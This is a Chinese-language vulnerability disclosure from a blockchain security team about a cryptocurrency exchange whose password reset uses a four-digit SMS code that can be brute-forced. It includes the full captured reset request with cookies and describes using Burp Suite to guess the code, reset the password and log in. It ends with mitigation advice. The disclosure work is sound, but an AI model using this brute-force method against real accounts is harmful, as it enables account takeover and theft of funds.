日前，知名區塊鏈安全團隊BYSEC發現一交易所的邏輯漏洞。據分析，黑客可以通過暴力破解并且修改賬戶密碼。

旨在保證交易所的資金安全，督促其及時修復漏洞，BYSEC將披露此漏洞以及黑客的攻擊手法，并提供安全建議，望各大交易所防患于未然。

一：登陸賬號（以自己賬號為例），并找回驗證碼

在找回密碼的地方，同樣由于驗證碼只有四位，且有效期并不是短信所說的五分鐘，可對驗證碼進行暴力破解。

找回密碼的地方發送驗證碼后抓包

POST /index.php/index/login/findpwd.html HTTP/1.1

Host: www.xxx.com

Content-Length: 119

Accept: */*

Origin: http://www.xxx.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://www.xx/index.php/index/login/findpwd.html

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: UM_distinctid=163c8a60f6159c-0b4bd043eec36-5e183017-13c680-163c8a60f626f9; parent_qimo_sid_e9218490-6333-11e8-a3c9-b1478a226697=35fdda40-67c4-11e8-83e4-79a21b6dfa62; accessId=e9218490-6333-11e8-a3c9-b1478a226697; pageViewNum=47; UM_distinctid=163c995bcfe252-0d945e09fb268f-5e183017-13c680-163c995bcff46f; bad_ide9218490-6333-11e8-a3c9-b1478a226697=ee01da81-679f-11e8-823a-23b1a05aa1d6; PHPSESSID=l1qlol0kf3fnja716emjaotf90; CNZZDATA1273849067=1079089793-1528075768-|1528101117; names=4015pF5qhMZgbLFCCuwQtNG2VYYlyMnhmmNUSRlT9HIhwDyDUD1rxxryXPM1

Connection: close

userType=1&userName=1381&countryCode=+86&smsCode=4314&imgCode=gkc&newPassword=123456qwe&newPasswords=123456qwe

這里用自己的賬號進行測試，針對四位驗證碼smsCode進行爆破

成功爆破出四位驗證碼然后重置密碼

二：使用Burp Suite工具成功爆破出四位驗證碼，重置密碼為123456qwe (重置前密碼是123456ttt)

三、和手機收到的驗證碼一致

四、利用重置的密碼成功登錄賬戶

對此，BYSEC對廣大交易所提出安全建議：

1、添加驗證碼機制，加入圖片（驗證碼動態生成且滿足隨機性）或者短信驗證碼（驗證碼具備超時時限一般為1分鐘，且在該時限內錯誤次數超過3次則進行鎖定1分鐘后方能重新獲取驗證碼，超時后驗證碼自動失效）！

2、驗證碼必須在服務器端進行校驗，客戶端的一切校驗都是不安全的！